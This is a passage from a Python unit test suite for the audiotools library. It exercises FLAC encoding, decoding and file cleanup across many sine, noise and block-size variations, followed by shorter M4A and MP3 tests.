temp.flush()
decoders = audiotools.open(temp.name).to_pcm()
self.assertRaises(ValueError,
audiotools.transfer_framelist_data,
decoders, lambda x: x)
finally:
temp.close()
#test that convert() from an invalid file also raises an exception
temp = tempfile.NamedTemporaryFile(suffix=".flac")
try:
temp.write(flac_data[0:-10])
temp.flush()
flac = audiotools.open(temp.name)
if (os.path.isfile("dummy.wav")):
os.unlink("dummy.wav")
self.assertEqual(os.path.isfile("dummy.wav"), False)
self.assertRaises(audiotools.EncodingError,
flac.convert,
"dummy.wav",
audiotools.WaveAudio)
self.assertEqual(os.path.isfile("dummy.wav"), False)
finally:
temp.close()
def __stream_variations__(self):
for stream in [
test_streams.Sine8_Mono(200000, 48000, 441.0, 0.50, 441.0, 0.49),
test_streams.Sine8_Mono(200000, 96000, 441.0, 0.61, 661.5, 0.37),
test_streams.Sine8_Mono(200000, 44100, 441.0, 0.50, 882.0, 0.49),
test_streams.Sine8_Mono(200000, 44100, 441.0, 0.50, 4410.0, 0.49),
test_streams.Sine8_Mono(200000, 44100, 8820.0, 0.70, 4410.0, 0.29),
test_streams.Sine8_Stereo(200000, 48000, 441.0, 0.50, 441.0, 0.49, 1.0),
test_streams.Sine8_Stereo(200000, 48000, 441.0, 0.61, 661.5, 0.37, 1.0),
test_streams.Sine8_Stereo(200000, 96000, 441.0, 0.50, 882.0, 0.49, 1.0),
test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.0),
test_streams.Sine8_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 1.0),
test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.50, 441.0, 0.49, 0.5),
test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.61, 661.5, 0.37, 2.0),
test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.50, 882.0, 0.49, 0.7),
test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.3),
test_streams.Sine8_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 0.1),
test_streams.Sine16_Mono(200000, 48000, 441.0, 0.50, 441.0, 0.49),
test_streams.Sine16_Mono(200000, 96000, 441.0, 0.61, 661.5, 0.37),
test_streams.Sine16_Mono(200000, 44100, 441.0, 0.50, 882.0, 0.49),
test_streams.Sine16_Mono(200000, 44100, 441.0, 0.50, 4410.0, 0.49),
test_streams.Sine16_Mono(200000, 44100, 8820.0, 0.70, 4410.0, 0.29),
test_streams.Sine16_Stereo(200000, 48000, 441.0, 0.50, 441.0, 0.49, 1.0),
test_streams.Sine16_Stereo(200000, 48000, 441.0, 0.61, 661.5, 0.37, 1.0),
test_streams.Sine16_Stereo(200000, 96000, 441.0, 0.50, 882.0, 0.49, 1.0),
test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.0),
test_streams.Sine16_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 1.0),
test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 441.0, 0.49, 0.5),
test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.61, 661.5, 0.37, 2.0),
test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 882.0, 0.49, 0.7),
test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.3),
test_streams.Sine16_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 0.1),
test_streams.Sine24_Mono(200000, 48000, 441.0, 0.50, 441.0, 0.49),
test_streams.Sine24_Mono(200000, 96000, 441.0, 0.61, 661.5, 0.37),
test_streams.Sine24_Mono(200000, 44100, 441.0, 0.50, 882.0, 0.49),
test_streams.Sine24_Mono(200000, 44100, 441.0, 0.50, 4410.0, 0.49),
test_streams.Sine24_Mono(200000, 44100, 8820.0, 0.70, 4410.0, 0.29),
test_streams.Sine24_Stereo(200000, 48000, 441.0, 0.50, 441.0, 0.49, 1.0),
test_streams.Sine24_Stereo(200000, 48000, 441.0, 0.61, 661.5, 0.37, 1.0),
test_streams.Sine24_Stereo(200000, 96000, 441.0, 0.50, 882.0, 0.49, 1.0),
test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.0),
test_streams.Sine24_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 1.0),
test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.50, 441.0, 0.49, 0.5),
test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.61, 661.5, 0.37, 2.0),
test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.50, 882.0, 0.49, 0.7),
test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.3),
test_streams.Sine24_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 0.1),
test_streams.Simple_Sine(200000, 44100, 0x7, 8,
(25, 10000),
(50, 20000),
(120, 30000)),
test_streams.Simple_Sine(200000, 44100, 0x33, 8,
(25, 10000),
(50, 20000),
(75, 30000),
(65, 40000)),
test_streams.Simple_Sine(200000, 44100, 0x37, 8,
(25, 10000),
(35, 15000),
(45, 20000),
(50, 25000),
(55, 30000)),
test_streams.Simple_Sine(200000, 44100, 0x3F, 8,
(25, 10000),
(45, 15000),
(65, 20000),
(85, 25000),
(105, 30000),
(120, 35000)),
test_streams.Simple_Sine(200000, 44100, 0x7, 16,
(6400, 10000),
(12800, 20000),
(30720, 30000)),
test_streams.Simple_Sine(200000, 44100, 0x33, 16,
(6400, 10000),
(12800, 20000),
(19200, 30000),
(16640, 40000)),
test_streams.Simple_Sine(200000, 44100, 0x37, 16,
(6400, 10000),
(8960, 15000),
(11520, 20000),
(12800, 25000),
(14080, 30000)),
test_streams.Simple_Sine(200000, 44100, 0x3F, 16,
(6400, 10000),
(11520, 15000),
(16640, 20000),
(21760, 25000),
(26880, 30000),
(30720, 35000)),
test_streams.Simple_Sine(200000, 44100, 0x7, 24,
(1638400, 10000),
(3276800, 20000),
(7864320, 30000)),
test_streams.Simple_Sine(200000, 44100, 0x33, 24,
(1638400, 10000),
(3276800, 20000),
(4915200, 30000),
(4259840, 40000)),
test_streams.Simple_Sine(200000, 44100, 0x37, 24,
(1638400, 10000),
(2293760, 15000),
(2949120, 20000),
(3276800, 25000),
(3604480, 30000)),
test_streams.Simple_Sine(200000, 44100, 0x3F, 24,
(1638400, 10000),
(2949120, 15000),
(4259840, 20000),
(5570560, 25000),
(6881280, 30000),
(7864320, 35000))]:
yield stream
@FORMAT_FLAC
def test_streams(self):
for g in self.__stream_variations__():
md5sum = md5()
f = g.read(audiotools.FRAMELIST_SIZE)
while (len(f) > 0):
md5sum.update(f.to_bytes(False, True))
f = g.read(audiotools.FRAMELIST_SIZE)
self.assertEqual(md5sum.digest(), g.digest())
g.close()
def __test_reader__(self, pcmreader, **encode_options):
if (not audiotools.BIN.can_execute(audiotools.BIN["flac"])):
self.assert_(False,
"reference FLAC binary flac(1) required for this test")
temp_file = tempfile.NamedTemporaryFile(suffix=".flac")
self.encode(temp_file.name,
audiotools.BufferedPCMReader(pcmreader),
**encode_options)
self.assertEqual(subprocess.call([audiotools.BIN["flac"], "-ts",
temp_file.name]),
0,
"flac decode error on %s with options %s" % \
(repr(pcmreader),
repr(encode_options)))
flac = audiotools.open(temp_file.name)
self.assert_(flac.total_frames() > 0)
if (hasattr(pcmreader, "digest")):
self.assertEqual(flac.__md5__, pcmreader.digest())
md5sum = md5()
d = self.decoder(temp_file.name, pcmreader.channel_mask)
f = d.read(audiotools.FRAMELIST_SIZE)
while (len(f) > 0):
md5sum.update(f.to_bytes(False, True))
f = d.read(audiotools.FRAMELIST_SIZE)
d.close()
self.assertEqual(md5sum.digest(), pcmreader.digest())
temp_file.close()
@FORMAT_FLAC
def test_small_files(self):
for g in [test_streams.Generate01,
test_streams.Generate02,
test_streams.Generate03,
test_streams.Generate04]:
self.__test_reader__(g(44100),
block_size=1152,
max_lpc_order=16,
min_residual_partition_order=0,
max_residual_partition_order=3,
mid_side=True,
adaptive_mid_side=True,
exhaustive_model_search=True)
@FORMAT_FLAC
def test_full_scale_deflection(self):
for (bps, fsd) in [(8, test_streams.fsd8),
(16, test_streams.fsd16),
(24, test_streams.fsd24)]:
for pattern in [test_streams.PATTERN01,
test_streams.PATTERN02,
test_streams.PATTERN03,
test_streams.PATTERN04,
test_streams.PATTERN05,
test_streams.PATTERN06,
test_streams.PATTERN07]:
self.__test_reader__(
test_streams.MD5Reader(fsd(pattern, 100)),
block_size=1152,
max_lpc_order=16,
min_residual_partition_order=0,
max_residual_partition_order=3,
mid_side=True,
adaptive_mid_side=True,
exhaustive_model_search=True)
@FORMAT_FLAC
def test_sines(self):
import sys
for g in self.__stream_variations__():
self.__test_reader__(g,
block_size=1152,
max_lpc_order=16,
min_residual_partition_order=0,
max_residual_partition_order=3,
mid_side=True,
adaptive_mid_side=True,
exhaustive_model_search=True)
@FORMAT_FLAC
def test_wasted_bps(self):
self.__test_reader__(test_streams.WastedBPS16(1000),
block_size=1152,
max_lpc_order=16,
min_residual_partition_order=0,
max_residual_partition_order=3,
mid_side=True,
adaptive_mid_side=True,
exhaustive_model_search=True)
@FORMAT_FLAC
def test_blocksizes(self):
#FIXME - handle 8bps/24bps also
noise = struct.unpack(">32h", os.urandom(64))
encoding_args = {"min_residual_partition_order": 0,
"max_residual_partition_order": 6,
"mid_side": True,
"adaptive_mid_side": True,
"exhaustive_model_search": True}
for to_disable in [[],
["disable_verbatim_subframes",
"disable_constant_subframes"],
["disable_verbatim_subframes",
"disable_constant_subframes",
"disable_fixed_subframes"]]:
for block_size in [16, 17, 18, 19, 20, 21, 22, 23,
24, 25, 26, 27, 28, 29, 30, 31, 32, 33]:
for lpc_order in [0, 1, 2, 3, 4, 5, 7, 8, 9, 15, 16, 17,
31, 32]:
args = encoding_args.copy()
for disable in to_disable:
args[disable] = True
args["block_size"] = block_size
args["max_lpc_order"] = lpc_order
self.__test_reader__(test_streams.MD5Reader(
test_streams.FrameListReader(noise,
44100, 1, 16)),
**args)
@FORMAT_FLAC
def test_frame_header_variations(self):
max_lpc_order = 16
self.__test_reader__(test_streams.Sine16_Mono(200000, 96000,
441.0, 0.61, 661.5, 0.37),
block_size=max_lpc_order,
max_lpc_order=max_lpc_order,
min_residual_partition_order=0,
max_residual_partition_order=3,
mid_side=True,
adaptive_mid_side=True,
exhaustive_model_search=True)
self.__test_reader__(test_streams.Sine16_Mono(200000, 96000,
441.0, 0.61, 661.5, 0.37),
block_size=65535,
max_lpc_order=max_lpc_order,
min_residual_partition_order=0,
max_residual_partition_order=3,
mid_side=True,
adaptive_mid_side=True,
exhaustive_model_search=True)
self.__test_reader__(test_streams.Sine16_Mono(200000, 9,
441.0, 0.61, 661.5, 0.37),
block_size=1152,
max_lpc_order=max_lpc_order,
min_residual_partition_order=0,
max_residual_partition_order=3,
mid_side=True,
adaptive_mid_side=True,
exhaustive_model_search=True)
self.__test_reader__(test_streams.Sine16_Mono(200000, 90,
441.0, 0.61, 661.5, 0.37),
block_size=1152,
max_lpc_order=max_lpc_order,
min_residual_partition_order=0,
max_residual_partition_order=3,
mid_side=True,
adaptive_mid_side=True,
exhaustive_model_search=True)
self.__test_reader__(test_streams.Sine16_Mono(200000, 90000,
441.0, 0.61, 661.5, 0.37),
block_size=1152,
max_lpc_order=max_lpc_order,
min_residual_partition_order=0,
max_residual_partition_order=3,
mid_side=True,
adaptive_mid_side=True,
exhaustive_model_search=True)
#the reference encoder's test_streams.sh unit test
#re-does the 9Hz/90Hz/90000Hz tests for some reason
#which I won't repeat here
@FORMAT_FLAC
def test_option_variations(self):
#testing all the option variations
#against all the stream variations
#along with a few extra option variations
#takes a *long* time - so don't panic
for opts in self.encode_opts:
encode_opts = opts.copy()
for disable in [[],
["disable_verbatim_subframes",
"disable_constant_subframes"],
["disable_verbatim_subframes",
"disable_constant_subframes",
"disable_fixed_subframes"]]:
for extra in [[],
#FIXME - no analogue for -p option
["exhaustive_model_search"]]:
for d in disable:
encode_opts[d] = True
for e in extra:
encode_opts[e] = True
for g in self.__stream_variations__():
self.__test_reader__(g, **encode_opts)
@FORMAT_FLAC
def test_noise_silence(self):
for opts in self.encode_opts:
encode_opts = opts.copy()
for disable in [[],
["disable_verbatim_subframes",
"disable_constant_subframes"],
["disable_verbatim_subframes",
"disable_constant_subframes",
"disable_fixed_subframes"]]:
for (channels, mask) in [
(1, audiotools.ChannelMask.from_channels(1)),
(2, audiotools.ChannelMask.from_channels(2)),
(4, audiotools.ChannelMask.from_fields(
front_left=True,
front_right=True,
back_left=True,
back_right=True)),
(8, audiotools.ChannelMask(0))]:
for bps in [8, 16, 24]:
for extra in [[],
#FIXME - no analogue for -p option
["exhaustive_model_search"]]:
for blocksize in [None, 32, 32768, 65535]:
for d in disable:
encode_opts[d] = True
for e in extra:
encode_opts[e] = True
if (blocksize is not None):
encode_opts["block_size"] = blocksize
self.__test_reader__(
MD5_Reader(EXACT_RANDOM_PCM_Reader(
pcm_frames=65536,
sample_rate=44100,
channels=channels,
channel_mask=mask,
bits_per_sample=bps)),
**encode_opts)
self.__test_reader__(
MD5_Reader(EXACT_SILENCE_PCM_Reader(
pcm_frames=65536,
sample_rate=44100,
channels=channels,
channel_mask=mask,
bits_per_sample=bps)),
**encode_opts)
@FORMAT_FLAC
def test_fractional(self):
def __perform_test__(block_size, pcm_frames):
self.__test_reader__(
MD5_Reader(EXACT_RANDOM_PCM_Reader(
pcm_frames=pcm_frames,
sample_rate=44100,
channels=2,
bits_per_sample=16)),
block_size=block_size,
max_lpc_order=8,
min_residual_partition_order=0,
max_residual_partition_order=6)
for pcm_frames in [31, 32, 33, 34, 35, 2046, 2047, 2048, 2049, 2050]:
__perform_test__(33, pcm_frames)
for pcm_frames in [254, 255, 256, 257, 258, 510, 511, 512, 513,
514, 1022, 1023, 1024, 1025, 1026, 2046, 2047,
2048, 2049, 2050, 4094, 4095, 4096, 4097, 4098]:
__perform_test__(256, pcm_frames)
for pcm_frames in [1022, 1023, 1024, 1025, 1026, 2046, 2047,
2048, 2049, 2050, 4094, 4095, 4096, 4097, 4098]:
__perform_test__(2048, pcm_frames)
for pcm_frames in [1022, 1023, 1024, 1025, 1026, 2046, 2047,
2048, 2049, 2050, 4094, 4095, 4096, 4097,
4098, 4606, 4607, 4608, 4609, 4610, 8190,
8191, 8192, 8193, 8194, 16382, 16383, 16384,
16385, 16386]:
__perform_test__(4608, pcm_frames)
#PCMReaders don't yet support seeking,
#so the seek tests can be skipped
#cuesheets are supported at the metadata level,
#which is tested above
#WAVE and AIFF length fixups are handled by the
#WaveAudio and AIFFAudio classes
#multiple file handling is performed at the tool level
#as is metadata handling
@FORMAT_FLAC
def test_clean(self):
#metadata is tested separately
from audiotools.text import (CLEAN_FLAC_REMOVE_ID3V2,
CLEAN_FLAC_REMOVE_ID3V1,
CLEAN_FLAC_REORDERED_STREAMINFO,
CLEAN_FLAC_POPULATE_MD5,
CLEAN_FLAC_ADD_CHANNELMASK,
CLEAN_FLAC_FIX_SEEKTABLE)
#check FLAC files with ID3 tags
f = open("flac-id3.flac", "rb")
self.assertEqual(f.read(3), "ID3")
f.close()
track = audiotools.open("flac-id3.flac")
metadata1 = track.get_metadata()
fixes = []
self.assertEqual(track.clean(fixes), None)
self.assertEqual(fixes,
[CLEAN_FLAC_REMOVE_ID3V2,
CLEAN_FLAC_REMOVE_ID3V1])
temp = tempfile.NamedTemporaryFile(suffix=".flac")
try:
fixes = []
self.assertNotEqual(track.clean(fixes, temp.name), None)
self.assertEqual(fixes,
[CLEAN_FLAC_REMOVE_ID3V2,
CLEAN_FLAC_REMOVE_ID3V1])
f = open(temp.name, "rb")
self.assertEqual(f.read(4), "fLaC")
f.close()
track2 = audiotools.open(temp.name)
self.assertEqual(metadata1, track2.get_metadata())
self.assertEqual(audiotools.pcm_frame_cmp(
track.to_pcm(), track2.to_pcm()), None)
finally:
temp.close()
#check FLAC files with STREAMINFO in the wrong location
f = open("flac-disordered.flac", "rb")
self.assertEqual(f.read(5), "fLaC\x04")
f.close()
track = audiotools.open("flac-disordered.flac")
metadata1 = track.get_metadata()
fixes = []
self.assertEqual(track.clean(fixes), None)
self.assertEqual(fixes,
[CLEAN_FLAC_REORDERED_STREAMINFO])
temp = tempfile.NamedTemporaryFile(suffix=".flac")
try:
fixes = []
self.assertNotEqual(track.clean(fixes, temp.name), None)
self.assertEqual(fixes,
[CLEAN_FLAC_REORDERED_STREAMINFO])
f = open(temp.name, "rb")
self.assertEqual(f.read(5), "fLaC\x00")
f.close()
track2 = audiotools.open(temp.name)
self.assertEqual(metadata1, track2.get_metadata())
self.assertEqual(audiotools.pcm_frame_cmp(
track.to_pcm(), track2.to_pcm()), None)
finally:
temp.close()
#check FLAC files with empty MD5 sum
track = audiotools.open("flac-nonmd5.flac")
fixes = []
self.assertEqual(track.get_metadata().get_block(
audiotools.flac.Flac_STREAMINFO.BLOCK_ID).md5sum, chr(0) * 16)
self.assertEqual(track.clean(fixes), None)
self.assertEqual(fixes, [CLEAN_FLAC_POPULATE_MD5])
temp = tempfile.NamedTemporaryFile(suffix=".flac")
try:
fixes = []
self.assertNotEqual(track.clean(fixes, temp.name), None)
self.assertEqual(fixes, [CLEAN_FLAC_POPULATE_MD5])
track2 = audiotools.open(temp.name)
self.assertEqual(track2.get_metadata().get_block(
audiotools.flac.Flac_STREAMINFO.BLOCK_ID).md5sum,
'\xd2\xb1 \x19\x90\x19\xb69' +
'\xd5\xa7\xe2\xb3F>\x9c\x97')
self.assertEqual(audiotools.pcm_frame_cmp(
track.to_pcm(), track2.to_pcm()), None)
finally:
temp.close()
#check 24bps/6ch FLAC files without WAVEFORMATEXTENSIBLE_CHANNEL_MASK
for (path, mask) in [("flac-nomask1.flac", 0x3F),
("flac-nomask2.flac", 0x3F),
("flac-nomask3.flac", 0x3),
("flac-nomask4.flac", 0x3)]:
no_blocks_file = tempfile.NamedTemporaryFile(suffix=".flac")
try:
no_blocks_file.write(open(path, "rb").read())
no_blocks_file.flush()
track = audiotools.open(no_blocks_file.name)
metadata = track.get_metadata()
for block_id in range(1, 7):
metadata.replace_blocks(block_id, [])
track.update_metadata(metadata)
for track in [audiotools.open(path),
audiotools.open(no_blocks_file.name)]:
fixes = []
self.assertEqual(track.clean(fixes), None)
self.assertEqual(fixes, [CLEAN_FLAC_ADD_CHANNELMASK])
temp = tempfile.NamedTemporaryFile(suffix=".flac")
try:
fixes = []
track.clean(fixes, temp.name)
self.assertEqual(
fixes,
[CLEAN_FLAC_ADD_CHANNELMASK])
new_track = audiotools.open(temp.name)
self.assertEqual(new_track.channel_mask(),
track.channel_mask())
self.assertEqual(int(new_track.channel_mask()), mask)
metadata = new_track.get_metadata()
self.assertEqual(
metadata.get_block(
audiotools.flac.Flac_VORBISCOMMENT.BLOCK_ID)[
u"WAVEFORMATEXTENSIBLE_CHANNEL_MASK"][0],
u"0x%.4X" % (mask))
finally:
temp.close()
finally:
no_blocks_file.close()
#check bad seekpoint destinations
track = audiotools.open("flac-seektable.flac")
fixes = []
self.assertEqual(track.clean(fixes), None)
self.assertEqual(fixes, [CLEAN_FLAC_FIX_SEEKTABLE])
temp = tempfile.NamedTemporaryFile(suffix=".flac")
try:
fixes = []
track.clean(fixes, temp.name)
self.assertEqual(
fixes,
[CLEAN_FLAC_FIX_SEEKTABLE])
new_track = audiotools.open(temp.name)
fixes = []
new_track.clean(fixes, None)
self.assertEqual(fixes, [])
finally:
temp.close()
@FORMAT_FLAC
def test_nonmd5(self):
flac = audiotools.open("flac-nonmd5.flac")
self.assertEqual(flac.__md5__, chr(0) * 16)
md5sum = md5()
#ensure that a FLAC file with an empty MD5 sum
#decodes without errors
audiotools.transfer_framelist_data(flac.to_pcm(),
md5sum.update)
self.assertEqual(md5sum.hexdigest(),
'd2b120199019b639d5a7e2b3463e9c97')
#ensure that a FLAC file with an empty MD5 sum
#verifies without errors
self.assertEqual(flac.verify(), True)
@FORMAT_FLAC
def test_python_codec(self):
#Python decoder and encoder are far too slow
#to run anything resembling a complete set of tests
#so we'll cut them down to the very basics
def test_python_reader(pcmreader, **encode_options):
from audiotools.py_encoders import encode_flac
#encode file using Python-based encoder
temp_file = tempfile.NamedTemporaryFile(suffix=".flac")
encode_flac(temp_file.name,
audiotools.BufferedPCMReader(pcmreader),
**encode_options)
#verify contents of file decoded by
#Python-based decoder against contents decoded by
#C-based decoder
from audiotools.py_decoders import FlacDecoder as FlacDecoder1
from audiotools.decoders import FlacDecoder as FlacDecoder2
self.assertEqual(audiotools.pcm_frame_cmp(
FlacDecoder1(temp_file.name, 0),
FlacDecoder2(temp_file.name, 0)), None)
temp_file.close()
#test small files
for g in [test_streams.Generate01,
test_streams.Generate02,
test_streams.Generate03,
test_streams.Generate04]:
test_python_reader(g(44100),
block_size=1152,
max_lpc_order=16,
min_residual_partition_order=0,
max_residual_partition_order=3,
mid_side=True,
adaptive_mid_side=True,
exhaustive_model_search=True)
#test full-scale deflection
for (bps, fsd) in [(8, test_streams.fsd8),
(16, test_streams.fsd16),
(24, test_streams.fsd24)]:
for pattern in [test_streams.PATTERN01,
test_streams.PATTERN02,
test_streams.PATTERN03,
test_streams.PATTERN04,
test_streams.PATTERN05,
test_streams.PATTERN06,
test_streams.PATTERN07]:
test_python_reader(
fsd(pattern, 100),
block_size=1152,
max_lpc_order=16,
min_residual_partition_order=0,
max_residual_partition_order=3,
mid_side=True,
adaptive_mid_side=True,
exhaustive_model_search=True)
#test sines
for g in [test_streams.Sine8_Mono(5000, 48000,
441.0, 0.50, 441.0, 0.49),
test_streams.Sine8_Stereo(5000, 48000,
441.0, 0.50, 441.0, 0.49, 1.0),
test_streams.Sine16_Mono(5000, 48000,
441.0, 0.50, 441.0, 0.49),
test_streams.Sine16_Stereo(5000, 48000,
441.0, 0.50, 441.0, 0.49, 1.0),
test_streams.Sine24_Mono(5000, 48000,
441.0, 0.50, 441.0, 0.49),
test_streams.Sine24_Stereo(5000, 48000,
441.0, 0.50, 441.0, 0.49, 1.0),
test_streams.Simple_Sine(5000, 44100, 0x7, 8,
(25, 10000),
(50, 20000),
(120, 30000)),
test_streams.Simple_Sine(5000, 44100, 0x33, 8,
(25, 10000),
(50, 20000),
(75, 30000),
(65, 40000)),
test_streams.Simple_Sine(5000, 44100, 0x37, 8,
(25, 10000),
(35, 15000),
(45, 20000),
(50, 25000),
(55, 30000)),
test_streams.Simple_Sine(5000, 44100, 0x3F, 8,
(25, 10000),
(45, 15000),
(65, 20000),
(85, 25000),
(105, 30000),
(120, 35000)),
test_streams.Simple_Sine(5000, 44100, 0x7, 16,
(6400, 10000),
(12800, 20000),
(30720, 30000)),
test_streams.Simple_Sine(5000, 44100, 0x33, 16,
(6400, 10000),
(12800, 20000),
(19200, 30000),
(16640, 40000)),
test_streams.Simple_Sine(5000, 44100, 0x37, 16,
(6400, 10000),
(8960, 15000),
(11520, 20000),
(12800, 25000),
(14080, 30000)),
test_streams.Simple_Sine(5000, 44100, 0x3F, 16,
(6400, 10000),
(11520, 15000),
(16640, 20000),
(21760, 25000),
(26880, 30000),
(30720, 35000)),
test_streams.Simple_Sine(5000, 44100, 0x7, 24,
(1638400, 10000),
(3276800, 20000),
(7864320, 30000)),
test_streams.Simple_Sine(5000, 44100, 0x33, 24,
(1638400, 10000),
(3276800, 20000),
(4915200, 30000),
(4259840, 40000)),
test_streams.Simple_Sine(5000, 44100, 0x37, 24,
(1638400, 10000),
(2293760, 15000),
(2949120, 20000),
(3276800, 25000),
(3604480, 30000)),
test_streams.Simple_Sine(5000, 44100, 0x3F, 24,
(1638400, 10000),
(2949120, 15000),
(4259840, 20000),
(5570560, 25000),
(6881280, 30000),
(7864320, 35000))]:
test_python_reader(g,
block_size=1152,
max_lpc_order=16,
min_residual_partition_order=0,
max_residual_partition_order=3,
mid_side=True,
adaptive_mid_side=True,
exhaustive_model_search=True)
#test wasted BPS
test_python_reader(test_streams.WastedBPS16(1000),
block_size=1152,
max_lpc_order=16,
min_residual_partition_order=0,
max_residual_partition_order=3,
mid_side=True,
adaptive_mid_side=True,
exhaustive_model_search=True)
#test block sizes
noise = struct.unpack(">32h", os.urandom(64))
encoding_args = {"min_residual_partition_order": 0,
"max_residual_partition_order": 6,
"mid_side": True,
"adaptive_mid_side": True,
"exhaustive_model_search": True}
for block_size in [16, 17, 18, 19, 20, 21, 22, 23,
24, 25, 26, 27, 28, 29, 30, 31, 32, 33]:
for lpc_order in [0, 1, 2, 3, 4, 5, 7, 8, 9, 15, 16, 17, 31, 32]:
args = encoding_args.copy()
args["block_size"] = block_size
args["max_lpc_order"] = lpc_order
test_python_reader(
test_streams.FrameListReader(noise, 44100, 1, 16),
**args)
class M4AFileTest(LossyFileTest):
def setUp(self):
self.audio_class = audiotools.M4AAudio
self.suffix = "." + self.audio_class.SUFFIX
@FORMAT_M4A
def test_length(self):
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
for seconds in [1, 2, 3, 4, 5, 10, 20, 60, 120]:
track = self.audio_class.from_pcm(temp.name,
BLANK_PCM_Reader(seconds))
self.assertEqual(int(round(track.seconds_length())), seconds)
finally:
temp.close()
@FORMAT_LOSSY
def test_channels(self):
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
for channels in [1, 2, 3, 4, 5, 6]:
track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
1, channels=channels, channel_mask=0))
if (self.audio_class is audiotools.m4a.M4AAudio_faac):
self.assertEqual(track.channels(), 2)
track = audiotools.open(temp.name)
self.assertEqual(track.channels(), 2)
else:
self.assertEqual(track.channels(), max(2, channels))
track = audiotools.open(temp.name)
self.assertEqual(track.channels(), max(2, channels))
finally:
temp.close()
@FORMAT_M4A
def test_too(self):
#ensure that the 'too' meta atom isn't modified by setting metadata
temp = tempfile.NamedTemporaryFile(
suffix=self.suffix)
try:
track = self.audio_class.from_pcm(
temp.name,
BLANK_PCM_Reader(1))
metadata = track.get_metadata()
encoder = unicode(metadata['ilst']['\xa9too'])
track.set_metadata(audiotools.MetaData(track_name=u"Foo"))
metadata = track.get_metadata()
self.assertEqual(metadata.track_name, u"Foo")
self.assertEqual(unicode(metadata['ilst']['\xa9too']), encoder)
finally:
temp.close()
class MP3FileTest(LossyFileTest):
def setUp(self):
self.audio_class = audiotools.MP3Audio
self.suffix = "." + self.audio_class.SUFFIX
@FORMAT_MP3
def test_length(self):
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
for seconds in [1, 2, 3, 4, 5, 10, 20, 60, 120]:
track = self.audio_class.from_pcm(temp.name,
BLANK_PCM_Reader(seconds))
self.assertEqual(int(round(track.seconds_length())), seconds)
finally:
temp.close()
@FORMAT_MP3
def test_verify(self):
#test invalid file sent to to_pcm()
#FIXME - mpg123 doesn't generate errors on invalid files
#Ultimately, all of MP3/MP2 decoding needs to be internalized
#so that these sorts of errors can be caught consistently.
# temp = tempfile.NamedTemporaryFile(
# suffix=self.suffix)
# try:
# track = self.audio_class.from_pcm(
# temp.name,
# BLANK_PCM_Reader(1))
# good_data = open(temp.name, 'rb').read()
# f = open(temp.name, 'wb')
# f.write(good_data[0:100])
# f.close()
# reader = track.to_pcm()
# audiotools.transfer_framelist_data(reader, lambda x: x)
# self.assertRaises(audiotools.DecodingError,
# reader.close)
# finally:
# temp.close()
#test invalid file send to convert()
# temp = tempfile.NamedTemporaryFile(
# suffix=self.suffix)
# try:
# track = self.audio_class.from_pcm(
# temp.name,
# BLANK_PCM_Reader(1))
# good_data = open(temp.name, 'rb').read()
# f = open(temp.name, 'wb')
# f.write(good_data[0:100])
# f.close()
# if (os.path.isfile("dummy.wav")):
# os.unlink("dummy.wav")
# self.assertEqual(os.path.isfile("dummy.wav"), False)
# self.assertRaises(audiotools.EncodingError,
# track.convert,
# "dummy.wav",
# audiotools.WaveAudio)
# self.assertEqual(os.path.isfile("dummy.wav"), False)
# finally:
# temp.close()
# #test verify() on invalid files
# temp = tempfile.NamedTemporaryFile(
# suffix=self.suffix)
# mpeg_data = cStringIO.StringIO()
# frame_header = audiotools.MPEG_Frame_Header("header")
# try:
# mpx_file = audiotools.open("sine" + self.suffix)
# self.assertEqual(mpx_file.verify(), True)
# for (header, data) in mpx_file.mpeg_frames():
# mpeg_data.write(frame_header.build(header))
# mpeg_data.write(data)
# mpeg_data = mpeg_data.getvalue()
# temp.seek(0, 0)
# temp.write(mpeg_data)
# temp.flush()
# #first, try truncating the file underfoot
# bad_mpx_file = audiotools.open(temp.name)
# for i in xrange(len(mpeg_data)):
# try:
# if ((mpeg_data[i] == chr(0xFF)) and
# (ord(mpeg_data[i + 1]) & 0xE0)):
# #skip sizes that may be the end of a frame
# continue
# except IndexError:
# continue
# f = open(temp.name, "wb")
# f.write(mpeg_data[0:i])
# f.close()
# self.assertEqual(os.path.getsize(temp.name), i)
# self.assertRaises(audiotools.InvalidFile,
# bad_mpx_file.verify)
# #then try swapping some of the header bits
# for (field, value) in [("sample_rate", 48000),
# ("channel", 3)]:
# temp.seek(0, 0)
# for (i, (header, data)) in enumerate(mpx_file.mpeg_frames()):
# if (i == 1):
# setattr(header, field, value)
# temp.write(frame_header.build(header))
# temp.write(data)
# else:
# temp.write(frame_header.build(header))
# temp.write(data)
# temp.flush()
# new_file = audiotools.open(temp.name)
# self.assertRaises(audiotools.InvalidFile,
# new_file.verify)
# finally:
# temp.close()
pass
@FORMAT_MP3
def test_id3_ladder(self):
temp_file = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
track = self.audio_class.from_pcm(temp_file.name,
BLANK_PCM_Reader(5))
dummy_metadata = audiotools.MetaData(track_name=u"Foo")
#ensure that setting particular ID3 variant
